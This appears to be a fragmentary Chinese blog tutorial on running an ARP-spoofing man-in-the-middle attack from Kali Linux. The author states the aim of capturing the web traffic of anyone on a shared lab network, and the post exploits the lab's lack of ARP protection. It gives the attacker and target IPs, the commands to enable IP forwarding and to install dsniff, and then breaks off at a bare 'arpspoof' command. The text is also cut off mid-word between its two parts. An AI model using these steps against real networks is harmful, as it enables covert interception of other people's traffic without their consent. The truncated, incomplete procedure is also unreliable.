最近搞了一个监听神器，尽管使用了网卡混杂模式，不过监听到的几乎全是本地流量， 为了获取更多有用的数据，搞一下中间人攻击，最基本的就是arpspoof + IP转发，这样就可以获得局域网内任何人的上网流量， 难得的是实验室没有做ARP防护，给arpspoof一个大行其道的机会。 arpspoof 实战环境 攻击者(kali linux)：10.10.10.1攻击目标：10.10.10.2默认网

首先先输入su进入root用户然后开启转发 echo 1 >/proc/sys/net/ipv4/ip_forward 看看是否开启成功，返回1为成功 cat /proc/sys/net/ipv4/ip_forward 下载dnsspoof工具 apt-get install dsniff 从查看自己的ip和目标的ip   用kali的网关ip进行攻击 arpspoof